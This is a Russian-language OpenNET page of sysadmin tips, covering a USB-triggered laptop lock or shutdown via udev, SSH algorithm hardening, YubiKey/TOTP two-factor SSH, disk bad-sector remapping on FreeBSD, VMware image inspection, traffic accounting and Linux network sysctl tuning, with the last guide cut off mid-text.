The OpenNET Project: СОВЕТЫ (Краткие заметки, Tips) (базовая разбивка)

СОВЕТЫ (Краткие заметки, Tips) (базовая разбивка)

Администратору

Сетевая подсистема, маршрутизация

Ethernet, ARP, привязка MAC адресов.

NAT, трансляция адресов

Policy routing

PPP, PPTP, PPPOE

Wifi, настройка беспроводного доступа

Ограничение трафика

Пакетные фильтры и фаерволы

Пакетные фильтры в Linux: iptables, ipchains

Пакетный фильтр в FreeBSD: ipfw, IP-Filter

Проблемы работы сети

Туннелинг, VPN, VLAN

Сетевые сервисы

DNS

FTP, Bittorrent

INN

Mail, почта

Безопасность и установка ограничений

Борьба со спамом, фильтрация почты

Отправка и пересылка сообщений на уровне пользователя

NFS

Samba

SNMP

Socks proxy

WWW, Apache httpd

Ограничение доступа и ресурсов, безопасность

Оптимизация и тюнинг Apache

Редирект, mod_rewrite

Прокси сервер Squid

ACL, ограничения трафика и пользователей

Система

FreeBSD специфика

Сис. информация, оптимизация и тюнинг FreeBSD

Увеличение безопасности FreeBSD

Установка и апгрейд FreeBSD и приложений.

Linux специфика

Оптимизация и тюнинг в Linux

Увеличение безопасности Linux

Установка и работа с пакетами программ в Linux

OpenBSD

Solaris специфика

Syslog, ведение логов

Диски и файлы

CD-ROM, CD-R, AudioCD:

RAID массивы

Ramdisk, tmpfs

Диагностика и Восстановление после сбоя

Квоты

Монтирование

Резервное копирование

Файловые системы

Загрузка, однопользовательский режим

Кластерные технологии

Поддержка аппаратного обеспечения

Просмотр состояния и мониторинг системы

Установка и синхронизация времени

Простое устройство для защиты данных в случае кражи ноутбука (доп. ссылка 1) [комментарии]

Майкл Олтфилт (Michael Altfield) предложил простое и эффективное устройство для блокирования доступа к конфиденциальным данным в случае кражи ноутбука с активным пользовательским сеансом. Суть метода в контроле за подключением к ноутбуку определённого USB-устройства, прикреплённого к владельцу (аналогично в качестве признака можно использовать достижимость Bluetooth смартфона владельца или метку RFID). Во время работы в общественном месте или парке на ноутбуке активируется специальное правило UDEV, которое контролирует активность подключения к USB-устройству. В случае отсоединения USB-устройства (когда злоумышленник выхватил ноутбук) UDEV-правило выполняет скрипт для завершения сеанса, удаления каталога с конфиденциальными данными, шифрования данных или отмонтирования шифрованного раздела. Пример udev-правила для блокировки экрана при извлечении любого USB-устройства: sudo vi /etc/udev/rules.d/busKill.rules ACTION=="remove", SUBSYSTEM=="usb", RUN+="DISPLAY=:0 xscreensaver-command -lock" sudo udevadm control --reload Для привязки к определённому USB-устройству необходимо узнать его идентификатор (нужно подключить устройство, запустить udevadm monitor и извлечь устройство): udevadm monitor --environment --udev ACTION=remove ID_MODEL="Micromax_A74" SUBSYSTEM=usb Модифицируем правило /etc/udev/rules.d/busKill.rules ACTION=="remove", SUBSYSTEM=="usb", ENV{ID_MODEL}=="Micromax_A74", RUN+="DISPLAY=:0 xscreensaver-command -lock" Как вариант предложено дополнительно использовать магнитный разъединитель USB-кабеля, подключённый до брелока с ключами шифрования данных. Далее брелок подсоединяется цепочкой к одежде или руке владельца. При выдёргивании ноутбука во время работы брелок с ключами шифрования остаётся у владельца, а UDEV-скрипт экстренно выключает устройство. ACTION=="remove", SUBSYSTEM=="usb", ENV{ID_MODEL}=="Micromax_A74", RUN+="shutdown -h now" Активировать правило блокировки можно автоматически при подключении USB-устройства, добавив UDEV-правило с обработчиком ACTION=="bind" ACTION=="bind", SUBSYSTEM=="usb", ENV{ID_MODEL}=="Micromax_A74", RUN+="/root/killcord_on.sh" /root/killcord_on.sh cat << EOF | tee /etc/udev/rules.d/busKill.rules ACTION=="remove", SUBSYSTEM=="usb", ENV{ID_MODEL}=="Micromax_A74", RUN+="shutdown -h now" EOF udevadm control --reload

Настройка SSH для использования наиболее защищённых алгоритмов шифрования (доп. ссылка 1) [комментарии]

В свете появления сведений об организации АНБ атак, направленных на получение контроля над SSH-соединениями, подготовлено руководство с рекомендациями по усилению защищённости SSH. АНБ может получить контроль за SSH-соединением в случае использования уязвимых методов шифрования или в результате захвата приватных ключей. Ниже представлены советы по отключению потенциально проблемных алгоритмов и усилению защиты. Обмен ключами. Применяемые в SSH методы обмена ключей DH (Diffie-Hellman) и ECDH (Elliptic Curve Diffie-Hellman) можно считать безопасными. Из 8 поддерживаемых в SSH протоколов обмена ключами вызывают подозрения три, основанные на рекомендациях NIST: ecdh-sha2-nistp256, ecdh-sha2-nistp384, ecdh-sha2-nistp521. Не заслуживающими полного доверия также можно считать протоколы, использующие потенциально проблемный SHA1. Протоколы curve25519-sha256 и diffie-hellman-group-exchange-sha256 пока не вызывают сомнений в безопасности. Для использования только заслуживающих доверия протоколов обмена ключами в /etc/ssh/sshd_config для сервера следует указать: KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256 Аналогичные настройки для клиента, в /etc/ssh/ssh_config: Host * KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256 В /etc/ssh/moduli можно указать (или удалить строки с размером ключа, менее 2048): ssh-keygen -G /tmp/moduli -b 4096 ssh-keygen -T /etc/ssh/moduli -f /tmp/moduli Аутентификация. В SSH поддерживается четыре алгоритма аутентификации по открытым ключам: DSA, ECDSA, Ed25519 и RSA. ECDSA завязан на технологиях NIST и должен быть отключен. К сожалению, если просто удалить ключ ECDSA, он будет повторно сгенерирован, поэтому можно воспользоваться обходным путём с создать заведомо нерабочую символическую ссылку, которая помешает сгенерировать и использовать ключ: cd /etc/ssh rm ssh_host_ecdsa_key* rm ssh_host_key* ln -s ssh_host_ecdsa_key ssh_host_ecdsa_key ln -s ssh_host_key ssh_host_key Так как размер ключей DSA не может превышать 1024, его тоже следует отключить тем же способом: cd /etc/ssh rm ssh_host_dsa_key* ln -s ssh_host_dsa_key ssh_host_dsa_key Далее, следует позаботиться о RSA, сгенерировав ключ большего размера: cd /etc/ssh rm ssh_host_rsa_key* ssh-keygen -t rsa -b 4096 -f ssh_host_rsa_key < /dev/null Для создания клиентских ключей лучше использовать команды: ssh-keygen -t ed25519 ssh-keygen -t rsa -b 4096 Симметричные шифры. Из 15 поддерживаемых в SSH алгоритмов симметричного шифрования, используемых для организации защиты установленного канала связи, безопасными можно считать chacha20-poly1305, aes*-ctr и aes*-gcm. Шифры 3des-cbc и arcfour потенциально уязвимы в силу использования DES и RC4, cast128-cbc применяет слишком короткий размер блока (64 бит). В итоге, в /etc/ssh/sshd_config рекомендуется добавить: Ciphers aes256-gcm@openssh.com,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr В /etc/ssh/ssh_config: Host * Ciphers aes256-gcm@openssh.com,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr Код аутентичности сообщения (MAC). Для шифров в режиме CTR для гарантирования целостности передаваемых блоков доверия заслуживает только метод Encrypt-then-MAC ("*-etm", MAC добавляется к уже зашифрованному блоку). Методы MAC-then-encrypt и Encrypt-and-MAC потенциально подвержены атакам. Из 18 доступных в SSH алгоритмов MAC сразу следует отбросить основанные на хэшах MD5 и SHA1, не стойких к выявлению коллизий, а также алгоритмы использующие размеры ключей менее 128 бит и размеры тегов менее 256 бит. В итоге, наиболее безопасными MAC можно считать hmac-sha2-512-etm и hmac-sha2-256-etm. В /etc/ssh/sshd_config: MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com В /etc/ssh/ssh_config: # Для GitHub в качестве исключения добавляем mac-sha2-512, так как он не поддерживает Encrypt-then-MAC. Host github.com MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512 Host * MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com Защита от утечки ключей. Наиболее простым способом получения контроля за SSH-соединением является захват ключей на стороне клиента или сервера. Рекомендации сводятся к соблюдению типовых правил поддержания безопасности системы: оперативная установка обновлений, установка программ только из надёжных источников, установка только действительно необходимых программ и сервисов, использование программ для которых доступны исходные тексты, включение дополнительных механизмов защиты (Grsecurity, сборка с флагом -fstack-protector). Для защиты ключей следует выбрать надёжный пароль доступа к клиентским файлам ключей. При формировании ключа для увеличения числа итераций хэширования можно использовать опцию "ssh-keygen -o -a число", что усложнит подбор пароля. Также можно сохранить ключи только на внешнем носителе, подключая его только во время соединения по SSH. Защита от анализа транзитного трафика. SSH-сервер можно настроить в виде скрытого сервиса Tor, что скроет IP, а также добавит дополнительный слой шифрования и аутентификации. Для приема соединений только через скрытый сервис Tor можно использовать следующие настройки: В /etc/ssh/sshd_config (для приема соединений из LAN следует вместо привязки к 127.0.0.1 использовать для ограничения доступа межетевой экран): ListenAddress 127.0.0.1:22 В /etc/tor/torrc добавим: HiddenServiceDir /var/lib/tor/hidden_service/ssh HiddenServicePort 22 127.0.0.1:22 Имя скрытого хоста для подключения можно найти в файле /var/lib/tor/hidden_service/ssh/hostname. Для настройки подключения клиента к скрытому сервису Tor в /etc/ssh/ssh_config можно добавить: Host *.onion ProxyCommand socat - SOCKS4A:localhost:%h:%p,socksport=9050

Двухфакторная аутентификация SSH с использованием YubiKey (доп. ссылка 1) Автор: Dvenum [комментарии]

Все началось с того, что я приобрел YubiKey и захотел использовать его для двухфакторной аутентификации SSH. Я также хотел иметь возможность восстановить доступ к серверу на случай, если потеряю ключ. Информация о том, как это сделать, слишком разрознена, поэтому я написал собственное руководство. Вещи, которые необходимо знать: * HOTP -- это алгоритм генерации одноразового пароля на основе счетчика. Счетчик меняется каждый раз, когда генерируется новый пароль. * TOTP -- алгоритм генерации пароля в зависимости от таймера, регулярно генерируется новый пароль. (30 секунд в этом случае). В результате, вы входите через SSH, видите запрос пароля и вводите пароль, предоставленный OTP, системой одноразовых паролей (one-time password) от YubiKey. Для аварийного доступа я настроил возможность аутентификации с помощью Android-приложения Google Authenticator. Я настраивал все на Debian Wheezy сервере, но это должно работать и для других похожих систем. Вам необходимо установить libpam-oath на сервере (>=1.12.4-1 или вы не сможете использовать аварийный вход). На вашем компьютере необходимо установить yubikey-personalization-gui, oathtool и libmime-base32-perl. Когда вы установите необходимые программы и библиотеки, то прежде, чем приступать к настройке, убедитесь, что у вас открыт дополнительный терминал с правами root, чтобы можно было исправить возможные ошибки. Ключ ниже указан просто для примера, вам необходимо подставить свой. Настройка YubiKey. Для начала, используем yubikey-personalisation-gui, чтобы настроить YubiKey и сгенерировать ключ. Укажите OATH-HOTP режим, отключите token идентификацию и скопируйте ключ куда-нибудь, он понадобится для настройки сервера. Не забудьте сохранить настройки в YubiKey. Создайте файл /etc/users.oath на сервере с содержанием: HOTP robin - 8a54ac40689f0bb99f306fdf186b0ef6bd153429 где robin это имя пользователя, использующего ключ, а большая шестнадцатиричная строка это ключ без пробелов, который вы сгенерировали ранее. Установите возможность читать файл только для root: # chmod 600 /etc/users.oath Измените /etc/pam.d/sshd таким образом, чтобы строка @include common-auth была раскомментирована, а после нее добавьте следующее: auth required pam_unix.so nullok_secure # OATH OTP auth required pam_oath.so usersfile=/etc/users.oath window=20 window=20 указывает, как много раз может быть нажата кнопка на YubiKey перед входом. Иными словами, как далеко в последовательности OTP модуль будет искать совпадение. Измените sshd_config, чтобы он разрешал вызов-ответ (Challenge-Response) аутентификацию. sed -i.bak -E -e 's/(ChallengeResponseAuthentication) no/\\1 yes/' /etc/ssh/sshd_config Вы можете проверить последовательность следующим образом: $ oathtool -w10 8a54ac40689f0bb99f306fdf186b0ef6bd153429 333518 886962 ... Если вы нажмете кнопку на YubiKey несколько раз, вы дожны увидеть точно такую же последовательность. Перезапустите ssh демон и все должно работать. Вам нужно ввести пароль, вы нажимаете на кнопку YubiKey. Настройка Google Authenticator Это будет аварийным входом на случай, если вы потеряете ключ. Используем здесь повременной счетчик TOTP вместо счетчика на основе последовательности. Для начала сгенерируйте случайный десятибайтовый ключ (20 символов в шестнадцатиричном виде): $ head -c 1024 /dev/urandom | openssl sha1 | tail -c 21 2c2d309a7a92e117df5a Добавьте строку в /etc/users.oath: HOTP/T30 robin - 2c2d309a7a92e117df5a T30 означает, что используется повременной алгоритм с 30-и секундной ротацией. Перед тем, как добавить этот же ключ в android приложение, мы должны представить его в base32 виде: $ perl -e 'use MIME::Base32 qw( RFC ); print lc(MIME::Base32::encode(pack("H*","2c2d309a7a92e117df5a")))."\\n";' fqwtbgt2slqrpx22 Эта команда на perl из шестнадцатиричного ключа сначала получает двоичный, который потом преобразовывает в base32. Проверить, что все работает, можно так: $ oathtool --totp -w10 2c2d309a7a92e117df5a 125557 804612 ... Последовательность должна совпадать с той, которую отдает android приложение. Поскольку алгоритм генерации основывается на времени, то разница времени на устройствах должна не превышать пары секунд. Теперь вы можете войти на сервер через повременной ключ, сгенерированный приложением или с помощью пароля, сгенерированным нажатием на кнопку YubiKey. Примечания Когда вы залогиньтесь, файл users.oath будет изменен, в него будет записано новое значение счетчика и время. Убедитесь, что файл не открыт в текстовом редакторе. Если кто-нибудь нажмет кнопку YubiKey много раз (больше двадцати для этого примера), то ключ рассинхронизируется с сервером и вам придется сбросить его, сгенерировав новый и заменив старый в users.oath. Есть еще libpam-google-authenticator, который ведет себя похожим образом, но недоступен для Debian Wheezy. Если у вас много сервереров и вы хотите использовать один YubiKey для всех, то вам потребуется что-нибудь вроде центрального сервера аутентификации, чтобы избежать рассинхронизации ключей.

Поиск "проблемных" бинарников в системе Автор: Карбофос [комментарии]

Если в системе по каким-то причинам есть бинарные файлы, а нет внешних библиотек к ним, то этот скрипт поможет достаточно просто найти такие файлы: #!/bin/bash # скрипт для поиска проблемных файлов # список директорий для поиска directory=("/usr/bin/" "/usr/sbin/" "/bin/" "/usr/lib/" "/usr/lib64/") toreplace="=> not found" # Loop through our array. for x in ${directory[@]} do # Find all Files # for i in $(find $x -type f -executable) for i in $(find $x -type f) do # если ldd выдает ошибку "not found".. n=`ldd "$i" | grep found 2>/dev/null` if [ -n "$n" ]; then # echo $i " not found lib: " $n # с небольшой корректировкой, выкидываем "=> not found" echo "$i not found lib(s): $n" | sed "s/$toreplace//g" fi done done

Доступ к файлам виртуальных машин VMware ESX из Fedora Linux (доп. ссылка 1) Автор: Andrey Markelov [обсудить]

Richard W.M. Jones в своем блоге опубликовал интересный пост (http://rwmj.wordpress.com/2010/01/06/examine-vmware-esx-with-libguestfs/) о работе при помощи утилит libguestfs с образами VMware ESX4. Немного дополнив, напишу, в чем суть. Во-первых нам понадобятся пакеты fuse-sshfs и guestfish. Первый позволяет монтировать при помощи FUSE удаленную файловую систему по SSH FTP, а второй установит в систему интерактивную командную оболочку, из которой можно получать доступ к образам дисков виртуальных машин, в том числе и vmdk. Естественно, в системе должны присутствовать стандартные компоненты виртуализации Fedora, в частности, работающий демон libvirtd. Для начала проверяем, какие присутствуют на хосте ESX виртуальные машины: $ virsh -c esx://192.168.1.12?no_verify=1 list --all Enter username for 192.168.1.12 [root]: Enter root password for 192.168.1.12: ID Имя Статус ---------------------------------- 208 www выполнение 224 mail выполнение - 2RHEL5_DS отключить - 2W2003_DC отключить - RHEL5_IPA отключить - RHEL5_Satellite53 отключить - RHEL5_Server1 отключить - RHEL5_Station отключить - RHEL5_Station2 отключить - RHEL5_Zimbra отключить Далее смонтируем через FUSE соответствующую директорию файловой системы vmfs: $ mkdir esx $ sshfs root@192.168.1.12:/vmfs/volumes esx root@192.168.1.12's password: $ cd esx/ $ ls 4ac343f6-500e2828-d805-0022640793d2 LocalStorage1 Естественно, мы ничего нового по сравнению с тем, что нам покажет vCenter client, не увидели. Далее переходим в директорию с нужной нам виртуальной машиной: $ cd LocalStorage1/RHEL5_IPA/ $ ls RHEL5_IPA-flat.vmdk RHEL5_IPA.vmdk RHEL5_IPA.vmx vmware.log RHEL5_IPA.nvram RHEL5_IPA.vmsd RHEL5_IPA.vmxf При помощи новой утилиты virt-list-filesystems (в версии libguestfs репозитория Fedora 12 пока ее нет, зато есть в Rawhide) смотрим какие разделы доступны внутри образа: $ virt-list-filesystems -al RHEL5_IPA-flat.vmdk /dev/sda1 ext3 /dev/vol0/home ext3 /dev/vol0/root ext3 /dev/sda3 swap И, наконец, запускаем интерактивную командную оболочку: $ guestfish --ro -a RHEL5_IPA-flat.vmdk -m /dev/vol0/root Welcome to guestfish, the libguestfs filesystem interactive shell for editing virtual machine filesystems. Type: 'help' for help with commands 'quit' to quit the shell > ll / total 192 drwxr-xr-x. 22 root root 4096 Oct 24 07:47 . dr-xr-xr-x 29 root root 0 Jan 8 12:59 .. drwxr-xr-x. 2 root root 4096 Oct 7 15:07 bin drwxr-xr-x. 2 root root 4096 Oct 7 13:45 boot drwxr-xr-x. 4 root root 4096 Oct 7 13:45 dev drwxr-xr-x. 93 root root 12288 Oct 24 07:47 etc drwxr-xr-x. 2 root root 4096 Oct 7 13:45 home .... Ну, а дальше man guestfish и help для списка команд оболочки. Для виртуальных машин с включенным SELinux крайне желательно использовать ключ --selinux, иначе при попытке записи файлов вы можете создать при монтировании образа r/w файлы без меток SELinux.

Быстрый способ учета трафика на сетевых интерфейсах (доп. ссылка 1) Автор: Gleb Poljakov [комментарии]

Дано: Почтовый сервер на базе Ubuntu 8.10 Четыре сетевых интерфейса Необходимо: Считать трафик на каждом интерфейсе, вести статистику. Решение: vnstat (http://humdi.net/vnstat/) - маленький консольный пакет, который считает трафик на указанных интерфейсах и не загружает систему. Показывает статистику по часам, дням неделям и тд. Не требует для своей работы привилегий суперпользователя, поддерживает Linux, *BSD и Darwin/MacOS X. Для доступа к статистике дополнительно доступен web-интерфейс. Устанавливаем vnstat: #apt-get install vnstat Инициализируем базу данных для каждого необходимого интерфейса: #vnstat -u -i eth0 #vnstat -u -i eth1 #vnstat -u -i eth2 Далее необходимо сказать vnstat запустить мониторинг интерфейса. Это можно сделать путем ifdown/ifup для каждого интерфейса, либо, если нет желания разрывать соединения выполнить для каждого: #IFACE=eth${i} #export IFACE #/bin/sh -x /etc/network/if-up.d/vnstat где ${i} порядковый номер интерфейса. Все, мониторинг готов, теперь по прошествии нескольких минут можно смотреть статистику #vnstat -q

Клонирование дисков во FreeBSD, используя снапшоты ФС [комментарии]

Создаем снапшот test1 раздела /home mount -v -u -o snapshot /home/snapshot/test1 /home или другой метод: mksnap_ffs /home /home/snapshot/test1 Привязываем снапшот к устройству /dev/md1: mdconfig -a -t vnode -f /home/snapshot/test1 -u 1 При необходимости снапшот можно смонтировать и посмотреть его содержимое: mount -o ro /dev/md1 /mnt .... umount /mnt Копируем содержимое раздела на второй диск: dd if=/dev/md1 of=/dev/ad4s1f bs=16k Отключаем снапшот mdconfig -d -u 1 Выполняем fsck на новом разделе: fsck -f /dev/ad4s1f

Как избавиться от нечитаемых секторов на диске [комментарии]

В логе smartd появились подобные свидетельства наличия нечитаемых секторов на диске: smartd[798]: Device: /dev/ad5, 15 Currently unreadable (pending) sectors smartd[798]: Device: /dev/ad5, 15 Offline uncorrectable sectors SMART тестирование подтвердило подозрения: Запускаем фоновый тест диска, не мешающий основной работе: smartctl -t long /dev/ad5 Ждем завершения периодически просматривая статус: smartctl -l selftest /dev/ad5 В итоге смотрим содержимое лога, в самом конце вывода: smartctl -a /dev/ad5 Имеем: # 1 Extended offline Completed: read failure 90% 2916 10373954 Выявляем полный список сбойных секторов, путем чтения всех данных с диска: dd if=/dev/ad5 of=/dev/null bs=512 conv=noerror,sync В один прекрасный момент появятся надписи вида: dd: /dev/ad5: Input/output error 10373954+0 records in 10373954+0 records out 5311464448 bytes transferred in 2427.397393 secs (2188131 bytes/sec) В системном логе увидим: kernel: ad5: TIMEOUT - READ_DMA retrying (1 retry left) LBA=10373954 kernel: ad5: TIMEOUT - READ_DMA retrying (0 retries left) LBA=10373954 .... kernel: ad5: FAILURE - READ_DMA timed out LBA=10374109 kernel: ad5: TIMEOUT - READ_DMA retrying (1 retry left) LBA=10374113 Проверяем, каждый участок еще раз: dd if=/dev/ad5 of=/dev/null bs=512 count=1 skip=10373954 conv=noerror,sync Смотрим какой файл в ФС подпадает под этот блок. Смотрим и примерно вычисляем номер раздела на который приходится сбойный сектор (LBA 10373954): fdisk -s /dev/ad5 /dev/ad5: 775221 cyl 16 hd 63 sec Part Start Size Type Flags 1: 63 398444067 0xa5 0x80 2: 398444130 382973535 0xa5 0x80 10373954 - 63 = 10373891 disklabel /dev/ad5s1 # /dev/ad5s1: 8 partitions: # size offset fstype [fsize bsize bps/cpg] a: 2097152 0 4.2BSD 2048 16384 28552 b: 4194304 2097152 swap c: 398444067 0 unused 0 0 # "raw" part d: 2097152 6291456 4.2BSD 2048 16384 28552 e: 10485760 8388608 4.2BSD 2048 16384 28552 f: 104857600 18874368 4.2BSD 2048 16384 28552 g: 104857600 123731968 4.2BSD 2048 16384 28552 h: 162127234 228589568 4.2BSD 2048 16384 28552 Видим, что 10373891 приходится на раздел /dev/ad5s1e Расчитываем смещение относительно начала раздела: 10373891 - 8388608 = 1985283 Находим иноду, которой принадлежит заданный блок: fsdb -r /dev/ad5s1e findblk 1985283 повторяем для каждого сбойного сектора (для Linux нужно использовать debugfs - http://smartmontools.sourceforge.net/BadBlockHowTo.txt) Пытаемся записать данные в сбойный сектор, чтобы инициировать процесс ремапинга на диске. sysctl kern.geom.debugflags=16 # иначе будет dd: /dev/ad5: Operation not permitted) dd if=/dev/zero of=/dev/ad5 bs=512 count=1 skip=10373954 conv=noerror,sync sysctl kern.geom.debugflags=0 Если после записи сектор начал читаться - все ok, если нет - резервная область на диске уже заполнена, пробуем запретить обращещние окружающих секторов в ФС: man badsect /dev/ad5s1e примонтирован как /usr, создаем директорию /usr/BAD и выполняем badsect /usr/BAD 1985283 fsck -y /dev/ad5s1e Полезные порты: /usr/ports/sysutils/recoverdm /usr/ports/sysutils/diskcheckd

Почему на нагруженных серверах лучше использовать SCSI диски, а не IDE. [комментарии]

1. Качество исполнения, запас прочности и надежность накопителей со SCSI интерфейсом как правило выше, чем у IDE. 2. Два подключенных к одному каналу контроллера IDE накопителя, не могут одновременно передавать данные по шине. 3. SCSI показывают значительно лучшую производительность в загруженной многозадачной среде, при обилии разрозненных параллельных запросов за счет более оптимального использования шины передачи данных. (конек IDE - линейное чтение, сильная сторона SCSI - случайный доступ). Поясняю: Специфика IDE такова, что запросы могут передаваться по одной шине последовательно (одна труба передачи данных, однопоточный режим). Допустим, если 100 процессов обращаются к данным на диске, запросы в рамках одного канала контроллера будут обрабатываться один за другим, каждый следующий после полного выполнения предыдущего (связка: выдача команды - получение данных). При использовании SCSI, допускается перекрытие запросов (организуется очередь команд), ответы при этом будут получены распараллеленно (асинхронная передача), при этом устройство заведомо зная подробности по командам находящимся в очереди, производит оптимизацию самостоятельно - минимизируя движение головок.

expect для автоматизации операций требующих ручного ввода [комментарии]

#!/usr/bin/expect -f # Забор файла по FTP spawn ftp ftp.test.ru expect "Name*:" { send "ftp\n"} expect "Password:" { send "ftp@\n"} expect "ftp>" {send "bin\n"} expect "ftp>" {send "prompt no\n"} expect "ftp>" {send "cd /pub/store\n"} expect "ftp>" {send "get arc.tar.gz\n"} expect "ftp>" {send "exit\n"} #!/usr/bin/expect -f # Выполнение операции используя telnet spawn telnet cisco.test.ru expect "login:" { send "adm\n"} expect "Password:" { send "пароль\n"} expect "#" {send "show users\n"} expect "#" {send "exit\n"}

Сетевая подсистема, маршрутизация

Ethernet, ARP, привязка MAC адресов.

NAT, трансляция адресов

Policy routing

PPP, PPTP, PPPOE

Wifi, настройка беспроводного доступа

Ограничение трафика

Пакетные фильтры и фаерволы

Пакетные фильтры в Linux: iptables, ipchains

Пакетный фильтр в FreeBSD: ipfw, IP-Filter

Проблемы работы сети

Туннелинг, VPN, VLAN

Часто используемые параметры sysctl, касающиеся настройки сети в Linux (доп. ссылка 1) Автор: zersh [комментарии]

От переводчика (@zersh). Это адаптированный перевод работы https://github.com/leandromoreira/linux-network-performance-parameters Для понимания некоторых моментов использовалась статья. Принимаются любые замечания и предложения. Спасибо zizmo и @servers(Artem) - за помощь и конструктивную критику) Лицензия: BSD-3 Введение Иногда люди пытаются найти некие универсальные значения параметров sysctl (https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt), применение которых во всех случаях позволит добиться и высокой пропускной способности, и низкой задержки при обработке сетевых запросов. К сожалению, это не возможно, хотя стоит отметить, что современные версии ядер по умолчанию уже неплохо настроены. Важно понимать, что изменение заданных по умолчанию настроек может ухудшить производительность (https://medium.com/@duhroach/the-bandwidth-delay-problem-c6a2a578b211). Это краткое руководство, в котором приведены часто используемые параметры sysctl, касающиеся настройки сети Linux, вдохновлённый иллюстрированным руководством по сетевому стеку Linux (https://blog.packagecloud.io/eng/2016/10/11/monitoring-tuning-linux-networking-stack-receiving-data-illustrated/) и многими постами Marek Majkowski (https://blog.cloudflare.com/how-to-achieve-low-latency/). Обзор сетевых очередей Linux Связь переменных sysctl с различными стадиями обработки сетевых потоков в Linux Входящие пакеты (Ingress) 1. Пакеты прибывают в NIC (сетевой адаптер) 2. NIC проверяет `MAC` (если не включён promiscuous-режим) и `FCS (Frame check sequence)` и принимает решение отбросить пакет или продолжить обработку. 3. NIC используя DMA (https://en.wikipedia.org/wiki/Direct_memory_access), помещает пакеты в RAM регионе, ранее подготовленном (mapped) драйвером. 4. NIC ставит ссылки в очередь на пакеты при получении ring buffer (https://en.wikipedia.org/wiki/Circular_buffer) очередь `rx` до истечения таймаута `rx-usecs` или `rx-frames` 5. NIC Генерируется аппаратное прерывание, чтобы система узнала о появлении пакета в памяти `hard IRQ` 6. CPU запустит `IRQ handler`, который запускает код драйвера 7. Драйвер вызовет `планировщик NAPI`, очистит `hard IRQ` 8. Драйвер будит подсистему NAPI с помощью `soft IRQ (NET_RX_SOFTIRQ)` 9. NAPI опрашивает данные, полученные из кольцевого буфера до тех пор пока не истечёт таймаут `netdev_budget_usecs`, или `netdev_budget` и `dev_weight` пакета 10. Linux также выделяет память для `sk_buff` 11. Linux заполняет метаданные: протокол, интерфейс, устанавливает MAC-адрес (setmacheader), удаляет ethernet 12. Linux передаёт skb (данные) в стэк ядра (`netif_receive_skb`) 13. Установит сетевые заголовки, клонирует `skb` ловушкам (вроде tcpdump) и передаст на вход 14. Пакеты обрабатываются в qdisc (Queueing discipline) размера `netdev_max_backlog`, алгоритм которого определяется `default_qdisc` 15. Вызывает `ip_rcv` и пакеты обрабатываются в IP 16. Вызывает netfilter (`PREROUTING`) 17. Проверяет маршрутизацию, кому предназначен пакет: переслать (forwarding) или локально (local) 18. Если локально, вызывает netfilter (`LOCAL_IN`) 19. Это вызовет протокол L4 (для примера `tcp_v4_rcv`) 20. Находит нужный сокет 21. Переходит на конечный автомат tcp (finite state machine). 22. Поставит пакет в входящий буфер, размер которого определяется правилами `tcp_rmem`. Если `tcp_moderate_rcvbuf` включён, ядро будет автоматически тюнить буфер приёма (receive) 23. Ядро сигнализирует приложению, что доступны данные (epoll или другая polling-система) 24. Приложение просыпается и читает данные Исходящие пакеты (Egress) 1. Приложение отправляет сообщение (`sendmsg` или другие) 2. TCP-стек выделяет память для skb_buff 3. Помещает skb в сокет буфера, размером `tcp_wmem` 4. Создаст TCP заголовки (источник и порт назначения, контрольная сумма) 5. Вызывает обработчик L3 (в данном случае `ipv4` в `tcp_write_xmit` и `tcp_transmit_skb`) 6. L3 (`ip_queue_xmit`) построит заголовок IP и вызовет netfilter (`LOCAL_OUT`) 7. Вызывает действие выходного маршрута (Calls output route action) 8. Вызывает netfilter (`POST_ROUTING`) 9. Фрагментирует пакет (`ip_output`) 10. Вызывает функции отправки L2 (`dev_queue_xmit`) 11. Подаёт на выход (QDisc) очередь длинной `txqueuelen` с алгоритмом `default_qdisc` 12. Код драйвера помещает пакеты в `ring buffer tx` 13. Драйвер генерирует `soft IRQ (NET_TX_SOFTIRQ)` после `tx-usecs` таймаута или `tx-frames` 14. Реактивирует аппаратное прерывание (IRQ) в NIC 15. Драйвер отражает (map) все пакеты (для отправки) в некоторую область DMA 16. NIC получит пакеты (через DMA) из RAM для передачи 17. После передачи NIC поднимет сигнал `hard IRQ` о его завершении 18. Драйвер обработает это прерывание IRQ (выключает) 19. И планирует (`soft IRQ`) NAPI poll system 20. NAPI будет обрабатывать сигналы приёма пакетов и освобождать ОЗУ Для отслеживания обработки событий, связанных с выполнением сетевой операции, можно использовать команду: perf trace --no-syscalls --event 'net:*' ping globo.com -c1 > /dev/null Что, Почему и Как - сеть и sysctl параметры Кольцевой буфер (Ring Buffer) - rx, tx Что: драйвер очереди приёма/отправки одной или нескольких очередей с фиксированным размером, обычно реализованный как FIFO, находится в ОЗУ Почему: буфер для плавного прима соединений без их отбрасывания. Возможно, вам понадобится увеличить эти очереди, когда вы увидите сбросы (drops) или переполнения, то есть, если поступает больше пакетов, чем ядро может обработать. Побочным эффектом от увеличения буфера может стать увеличение задержки. Как: Команда проверки: ethtool -g ethX Как изменить: ethtool -G ethX rx значение tx значение Как мониторить: ethtool -S ethX | grep -e "err" -e "drop" -e "over" -e "miss" -e "timeout" -e "reset" -e "restar" -e "collis" -e "over" | grep -v "\: 0" Слияние прерываний (Interrupt Coalescence - IC) - rx-usecs, tx-usecs, rx-frames, tx-frames (аппаратные IRQ) Что: количество микросекунд / кадров, ожидающих перед поднятием hard IRQ, с точки зрения сетевого адаптера это будет пакеты данных DMA до этого тайм-аута / количества кадров Почему: сокращение использования CPUs, аппаратных IRQ, может увеличить пропускную способность за счет задержки. Как: Команда проверки: ethtool -c ethX Как изменить: ethtool -C ethX rx-usecs value tx-usecs value Как мониторить: cat /proc/interrupts Объединение прерываний (soft IRQ) и управления сетевыми очередями QDisc входящих пакетов (ingress). Что: максимальное число микросекунд в одном NAPI (https://en.wikipedia.org/wiki/New_API) цикле опроса. Опрос завершится когда, либо `netdev_budget_usecs` истечёт по временя цикла опроса или количество обработанных пакетов достигнет `netdev_budget`. Почему: вместо того 